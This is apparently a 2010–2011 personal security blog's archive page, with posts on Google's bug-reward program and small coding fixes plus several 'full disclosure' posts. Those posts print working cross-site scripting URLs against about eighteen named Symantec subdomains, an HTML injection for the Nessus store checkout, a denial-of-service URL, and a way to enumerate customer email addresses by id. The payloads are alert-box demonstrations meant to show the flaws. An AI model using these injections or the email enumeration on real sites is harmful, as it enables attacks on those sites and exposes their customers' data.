0

Google Security Reward Program Honorable Mention

Posted by admin on Mar 20, 2011 in Bugs, Google Vulnerability Rewards, WebAppSec, XSS

Google Securtiy Well I finally made it onto the Google Security Hall of Fame. (Honourable Mention section of the page)

In fact my details got added  while back, however I haven’t had the time to update the blog.

The issue that got me on there was a cross site scripting issue (Self XSS in this case) in the invite functionality of Google Chat.

Google Chat is used throughout differing Google sites and all them looked like they were vulnerable; However upon checking the cookie returned it would seem that the issue lay not in the translation site or IGoogle as first thought but with GoogleUserContent which is not a site eligible for a reward.

I’d like to thank Adam Mein from the Google Security Team for all of his help and patience in the two and throw of helping to confirm and then assist in getting the issue fixed.

As everyone seems to like pictures I’ll link to a couple of them here

XSS 1

XSS 2

As for the arguments for and against paying for bugs. I’ve still not changed my stance, I’m all for it although my reasons have changed.

I have recently found a new bug in Chrome which would allowed an attacker to run injected code (Javascript / HTML / CSS etc read XSS) into any chrome browser upon visiting a site. One thing to note about this new issue is that this is not a site problem which is the case with virtually all normal XSS issues. In this case the issue is with  Chrome. I won’t go into the issue any more just now as it’s not yet fixed. however had I not already built up a relationship with Google I would most likely have gone to Tipping Point or other types of Bug Auction Sites.

So from my point and hopefully Google’s the program is a sucess due to the new relationships it creates between bug reporters and fixers.

Lastly here is a nice document from the Goggle security team talking about the success of the reward program.

Martin Hall

The Test Manager

 

 
1

Google’s Vulnerability Reward Program

Posted by admin on Dec 8, 2010 in Bugs, Google Vulnerability Rewards
Google Vulnerability Research Reward

Google Vulnerability Research Reward

Some of you may have heard that Google has recently launched a new programme to encourage responsible disclosure of security bugs in their products and websites.

This scheme is called the Google Vulnerability Reward Programme. You can read more about it on Google’s security blog

The basics are that anyone finding a “relevant” bug that could compromise the serurity or privacy of Google’s customers (that’s you & me) will receive a standard amount of $500.00 and if the bug found shows flair then Google may award upto $3,133.7 (spells eleet in hacker talk).

Now most people who try to find any bugs in Google will fail as their systems are some of the most widely used in the world and they can afford to hire the best of the best when it comes to Security Bods, System Testers (called Engineers in Test at Google) and also decent coders.

So we don’t therefore expect things to be easy, however I was surprised like many others to find quite a few issues.

Obviously I can’t post any details about the issues until Google give me the go ahead. However expect some posts in the near future.

The reward programme is a great way for System / Web Testers and Penetration Testers to try out a few things and learn something along the way.

One thing I will say is that Google are getting stricter on the issues reported that count

For example

I found a bug which allowed me to execute JavaScript (XSS) on virtually any of Google’s sites.  However Google deemed that it was not really a bug as it would not really be exploitable in the wild. Meaning that you couldn’t send a link or embed the malicious code on a site and have it actioned.

I still thought it was a major issue XSS on nearly every Google domain however they think otherwise. Either way I’ll keep the method secret in case they change their minds.

So you have to find issues that are going to be exploited in the real world, and also you have to find them first.

I also found a bug on another Google site and I submitted my report and got a reply from a security engineer that someone else had already reported the same issue before me.

If your thinking what’s to stop Google accepting your submissions and then just saying we already know about that one. Well the answer is nothing. It has to be a trust thing. They trust that the reporter will not exploit the bug for their own means and keep the issue secret and the reporters have to trust that Google works on honesty and wouldn’t lie just to save a few hundred or thousand dollars.

So if you have a few hours spare and want to have a bit of fun while learning then have a go.

Remember no automated tools and only test on your own account (nothing destructive).

Try and concentrate on a particular area which ever one you are best at. For me that would be XSS while as you can see from Neal Poole’s posts. He seems to focus more on CSRF.

Good luck.

 
0

Fix – undefined method `lines’ for #

Posted by admin on Oct 22, 2010 in code, productivity, tips
Ruby Logo

Ruby Logo

Again this is another note to myself, however it may be useful to others.

Yesterday I was attempting to run a Ruby script to check for ASP .Net Padding Oracle problems on a site and I got the following issue.

undefined method `lines’ for #<String:0x240d448>

I had looked at the Ruby Source code and all looked ok however there was still the issue when running the script.

It turns out that in Ruby Versions prior to Ruby 1.8.7 String doesn’t have a lines method and hence the error received. I was running Ruby 1.8.5

So the fix was a simple upgrade to the latest version of Ruby and then to run the script again and voilla the error is no more an issue.

Hope the above tip helps, if your receiving the same error.

 
0

Fix – The Selected file cannot be opened as a solution or project – Visual Studio Work Around

Posted by admin on Oct 4, 2010 in code, tips, VSTS
Visual Studio 2005

Visual Studio 2005

Yesterday I brought into work an application that I had developed at home. The application was written in VB.Net using Visual Studio 2008.

My work Development environment is Visual Studio 2005 and I needed to update the source code so I tried to load up the solution file and I received the error “The Selected file cannot be opened as a solution or project. Please select a solution file or project file “.

I know from past experience that .sln (solution) files are just text files with references to other code and the development environment.

So if you ever receive the above message and your moving code from Visual Studio 2008 to 2005 then load the sln file in a decent text editor (Notepad ++ will do)

change the top to lines from

Microsoft Visual Studio Solution File, Format Version 10.00
# Visual Studio 2008

to read

Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005

save the solution file and now open it in your 2005 development environment.

You may have to refactor some code if you have used new objects or syntax which are new to 2008.

However you should be able to to just code as normal.

 
0

A BlackHat Puppet Master who wants nothing from his puppets.

Posted by admin on Sep 13, 2010 in Uncategorized
The Black Hat Puppet Master

The Black Hat Puppet Master

 
Enter your password to view comments.

Protected: XSS Issue in every Ebay Listing

Posted by admin on Sep 6, 2010 in Uncategorized

This post is password protected. To view it please enter your password below:

 
3

Full Disclosure about 20 XSS bugs on Symantec.com and related domains

Posted by admin on Sep 3, 2010 in Full Disclosure, Month of Full Disclosure, WebAppSec, XSS
Symantec

Symantec 20 XSS issues

I have written a new tool called SubFinder (provisional name subject to change).

It does exactly as the name suggests. It will find Subdomains on any given host. It will do this via a few methods, first it will look in a couple of obvious places and then it will bruteforce the rest.

It will be released in the next couple of days.

I wanted to test it so I ran it against Symantec.com

I got over 200 subdomains found. (not all could be browsed, but loads were)

From the domain list I thought i would check some of them over for XSS issues. The reason that you will find more issues is because firstly these sub domains are usually used to host mini sites, or sub sites. When/If there is a code review then these can be missed.

Also SubDomains are more often than not coded by outsourced suppliers so even if Symantec had great processes in place (which they don’t) , there is a chance that the outsourced suppliers do not.

(1) symantecenterprise XSS

(2) Symantec Connect Search Feature XSS (IE Only?)

(3) https://et.symantec.com XSS (Fixed 17th November 2010?)

(4) http://maillist.entsupport.symantec.com XSS

(5) Bit of a strnge one this, if you go to https://renewalcenter.symantec.com/
and into the email box type
“><</div><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>
you should get an error which states invalid email address entered.
Now change the URL to
https://renewalcenter.symantec.com

and Bingo XSS (is it being stored? making it a sotred XSS
I don’t think so but not 100% sure)
(Fixed 17th November 2010?)

(6) http://www.symantec.com/ XSS (IE browsers only?) (Fixed 17th November 2010?)

(7) open redirect to XSS – http://www.messagelabs.co.uk/ XSS – Seems to only work in Firefox?, and not in IE? (Fixed 17th November 2010?)

(8) http://www.symantec.com/ Connect Forward XSS IE only? (Fixed 17th November 2010?)

(9) https://symantecevents XSS
Site development on the above seems to have outsourced to
http://verite.com/our-work/by-client/client-focus/?client_id=2

I’m guessing all of their sites for symantec would be easy targets.
(Fixed 17th November 2010?)

(10) http://seer.entsupport.symantec.com/ XSS

(11) http://aka-community.symantec.com

(12) https://careers.symantec.com/ XSS (may need to visit page twice as the
first time sets the cookie)

(13) https://chat.symantec.com XSS

(15) https://www4.symantec.com/ XSS

(16) http://seer.entsupport.symantec.com/ Navbar XSS

(17) Ouch Denial Of Service (DOS) via Bad Param Injection =
http://techcenter.symantec.com redirect to http://techcenter.symantec.com/ecampus/enterprise =
which works fine as do all other URLs on this techcenter subdomain.
However if I now use the url =
http://techcenter.symantec.com/ecampus/enterprise?cat=null&cmd=sc&courseNo=DP6000&EXValue=null&file=null&module&page=null&siteName=sena&type=g_
Then every url on that subdomain gets blown and the server responds with a http 500server error. This creates a Denial of Service on that Subdomain.

(18) http://cybercrimenews.norton.com XSS

(19) Every Symantec customer email address can be grabbed = http://bit.ly/91fZrT just change the id. you could start at 1 and work your way up. This is very easy to automate. looks like over 16 million potential email addresses?.

(1)

https://symantecenterprise.rsys3.net/servlet/campaignrespondent?FIRSTNAME=qq&LASTNAME=qqqq&COMPANY=qqqq&JOBTITLE=Vice+President&ADDRESS1=qqqq&ADDRESS2=qqqq&CITY=qqqq&STATEPROVINCE=AK&COUNTRY=United+States+of

+America&POSTALCODE=90210&PHONENUMBER=999&EMAIL=qqqq%40aaa&COMPANYSIZE=1+to+10&QUESTION=0659ttm</textarea> <br /><script>alert(‘The TestManager SymanTec Xss SubFinder

Test’)</script>&button=Submit&_RequiredFields_=FIRSTNAME%2CLASTNAME%2CCOMPANY%2CJOBTITLE%2CADDRESS1%2CCITY%2CSTATEPROVINCE%2CCOUNTRY%2CPOSTALCODE%2CPHONENUMBER%2CEMAIL%2CCOMPANYSIZE&_EMailFields_=EMAIL&_Real

Fields_=&_IntegerFields_=&_BannedFields_=TRUE&_ID_=symc.2114.-2&Campaign_=JK_Form_RequestSalesCall_MASTER&charset_=UTF-8&_InlineResponseRule_=true&_Sent_=2010-08-23+16%3A19%3A41.610&ACTIVITYCODE=92078&EMail_

=92078&__HIDDEN_FIELD_NAMES__=_RequiredFields_%3B_EMailFields_%3B_RealFields_%3B_IntegerFields_%3B_BannedFields_%3B_ID_%3BCampaign_%3Bcharset_%3B_InlineResponseRule_%3B_Sent_%3BACTIVITYCODE%3BEMail_%3B__HIDD

EN_FIELD_NAMES__

(2)

http://www.symantec.com/connect/search?filters=01a1ttm–”);</script><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,115,115,32,83,

117,98,70,105,110,100,101,114,32,84,101,115,116))</script>

(3) https://et.symantec.com/signup/thanks.html?fn=ttm</div><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>&em=aaaa@aaa.c

(4) http://maillist.entsupport.symantec.com/subscribe.asp?ddProduct=18d4ttm–”></form><script>alert(‘The Test Manager.com Sub Finder Symantec Test’)</script>&EmailAddress=&password=

(5) Bit of a strnge one this, if you go to https://renewalcenter.symantec.com/storefront/app/storefront.jsp?action=transferReloadCheckAccount&_requestid=99999
and into the email  box type
“><</div><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>
you should get an error which states invalid email address entered.
Now change the URL to

https://renewalcenter.symantec.com/storefront/app//storefront.jsp?action=transferReloadLogin&success=yes&_requestid=99999

and Bingo XSS (is it being stored? making it a sotred XSS – I don’t think so but not 100% sure)

(6) http://www.symantec.com/business/support/knowledge_base_results.jsp?SearchTerm=ttm”/><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>&ddProduct=&pid=&content=all

(7) open redirect to XSS – http://www.messagelabs.co.uk/resources/blog.aspx?link=javascript:alert(‘The Test Manager Sub Finder Symantec XSS Test’) – Seems to only work in Firefox? , and not in IE?

(8) http://www.symantec.com/connect/forward?path=2e6fttm–”);</script><script>alert(‘The Test Manager XSS Test for Sub FInder’)</script>

(9)

https://symantecevents.verite.com/?action=main.dsp_register&error=42f2ttm–</div><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,1

15,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))</script>
Site development on the above seems to have outsourced to http://verite.com/our-work/by-client/client-focus/?client_id=2& – I’m guessing all of their sites for symantec would be easy targets.

(10)

http://seer.entsupport.symantec.com/email_forms/sendmail.asp?ddProduct=&SrvURL=&type=10&strName=a&strEmail=ttm–%3C/p%3E%3Cscript%3Ealert%28%22TheTestManager%20Sub%20Finder%20Symantec%20test%22%29%3C/script%

3E&topic=symantec&strBODY=aaa&submit2=Send

(11)

https://symantecevents.verite.com/?action=event.dsp_cancel&event_id=17895&error=ttm–</div><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,

99,32,88,115,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))</script>test

(12) http://aka-community.symantec.com/lib/jsp/socialbookmarkingjs.jsp?lg=en&ct=us&segment=ttm–”);</script><script>alert(‘The Test Manager Xss Test using Sub Finder on Symantec’)</script>

(13) https://careers.symantec.com/psc/jobs/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL?4210ttm–”;</script><script>alert(‘the test manager xss test of sub finder on Symantec’)</script>test& (may need to visit page

twice as the first time sets the cookie)

(14) https://chat.symantec.com/sdcxuser/lachat/user/reentry.asp?email=05edttm–”><script>alert(‘XSS TEST’)</script>&lg=en&noqcode=

(15) https://www4.symantec.com/Vrt/vrtcontroller?EMAIL=0d07ttm–”><script>alert(‘The Test Manager Subfinder Xss

Symantec’)</script>&PASSWD=a&CONFIRM_PASSWD=a&a_id=48182&s_id=70&p_id=null&COMMAND_DESTINATION_URL=null&REDIRECT_PAGE=null&p_locale=en_US&l_id=&article_title=Results&t_id=62243672&t_s=1283128779469&EMAIL_AS_

USER_FLAG=Y&FRM_ACTION=Create+Account&ru=null

(16) http://seer.entsupport.symantec.com/nav_bar/side_nav.asp?ddProduct=ttm%22%3E%3Cscript%3Ealert%28%27The%20Test%20Manager%20Sub%20Finder%20Xss%20symantec%20Test%27%29%3C/script%3E

(17) Ouch DOS via Bad Param Injection = http://techcenter.symantec.com redirect to http://techcenter.symantec.com/ecampus/enterprise = which works fine as do all other URLs on this techcenter subdomain.
However if I now use the url = http://techcenter.symantec.com/ecampus/enterprise?cat=null&cmd=sc&courseNo=DP6000&EXValue=null&file=null&module&page=null&siteName=sena&type=g_
Then every url on that subdomain gets blown and the server responds with a http 500server error. This creates a Denial of Service on that Subdomain.

(18) http://cybercrimenews.norton.com/cgi-bin/search.cgi?target=1f10ttm–”><script>alert(‘The Test Manager XSS Sub Finder Tool Test’)</script>&rule=any&page=2

 
0

Full Disclosure – XSS Issue on Nitro Security Site.

Posted by admin on Aug 12, 2010 in Full Disclosure, Month of Full Disclosure, WebAppSec, XSS
Nitro Security XSS

Nitro Security XSS

Again we come with another (XSS) Cross Site Scripting Bugs on another Security Site.

This time it is on the site of Nitro Security

Now what I find a little bit strange is that Nitro Security states that it has created and sells 3 products which can detect Cross Site Scripting issues on websites.

The issue on there site has been there for a while and one would have thoguht that the company would have run its own tools against its won site to make sure that all is secure.

Unlike other security sites such as Tennable / Nessus etc on Nitro there is no attempt made to protect the site from user created data injections.

And with that I give you Nitro Security XSS Issue.

Nitro Security XSS

Nitro Security XSS

 
0

Full Disclosure – Nessus Website Vulnerable to XSS

Posted by admin on Aug 11, 2010 in Full Disclosure, Month of Full Disclosure, WebAppSec, XSS
The Test Manager Nessus XSS

The Test Manager Nessus Cross Site Scripting Error

Nessus is a product owned now by Tenable Network Security.

I had originally decided to do a month of Security Site Bugs as most security sites have a higher level of site protection and also they are more of a challenge for a researcher / tester to find bugs on, and lets face it a lot of us  do this for the challenge.

Due to the nature of the security business their sites are usually locked down fairly tight.

However you can still a good few issues here and there.

It would also seem that security sites are just as susceptible to code injections and other types of low hanging fruit.

and with that I give you

Tenable Network Security / Nessus – All your Base are Belong to Us.

Nessus All Your Base

Tenable / Nessus All Your Base

Bug Details as follows

Well the security isn’t that bad here, they do block a lot of tags, So this means No Script Tags , No Href tags, No Iframe or Frame Tags, No Img Tags,

So I had to get a little creative and hence you have the popular meme of “all your base”

this is done by firstly a Heading Tag which is not blocked and then I’m allowed to use Div Tags and Object Tags, oh year and I’m also allowed to close the TextArea Tag.

Once I worked out what I could use I put it all together see below for the injection.

</TEXTAREA><div><h1>The Test Manager Month Of Security Site Bugs</h1><object width=”480″ height=”385″><param name=”movie” value=”http://www.youtube.com/v/8fvTxv46ano&amp;hl=en_GB&amp;fs=1″></param><param name=”allowFullScreen” value=”true”></param><param name=”allowscriptaccess” value=”always”></param><embed src=”http://www.youtube.com/v/8fvTxv46ano&amp;hl=en_GB&amp;fs=1″ type=”application/x-shockwave-flash” allowscriptaccess=”always” allowfullscreen=”true” width=”480″ height=”385″></embed></object></div>

Now this is just a bit of fun rather than a fully exploitable bug.  The reason is that I could not get it to work from the URL.

To get the XSS to work you firstly need to have an item in your shopping cart and then checkout.

Then once your on the

https://products.nessus.org/one-page-checkout.asp page

there is a payment information box. Just put your code into that box and checkout. No need to fill in the rest of the form boxes the injection works when the form reloads.

Enjoy.

Martin H

The Test Manager.

 
1

Full Disclosure – Symantec Website Vulnerable to XSS

Posted by admin on Aug 10, 2010 in Full Disclosure, Month of Full Disclosure, WebAppSec, XSS

(Cross Site Scripting)I saw a post by d3v1l of http://security-sh3ll.blogspot.com/ where he posts a discovery of a cross site scripting issue on the Symantec site.

I remembered that I had found a similar issue a while back and hadn’t got round to disclosing it to them, so I therefore guess its fine to include in the month of full disclosure.

And with that I give you a new Symantec XSS bug.

Symantec XSS

Symantec XSS

Notes about the bug are as follows.

the issue is caused by Symantec not checking that html comments cannot be ended via user input. So all I had to do was to close the HMTL comment tag and then insert any code I saw fit. In this case a very simple JavaScript Alert box as is the norm with demonstrating XSS bugs and I also added a little Iframe.

Copyright © 2012 The Test Manager Blog All rights reserved. Theme by Laptop Geek.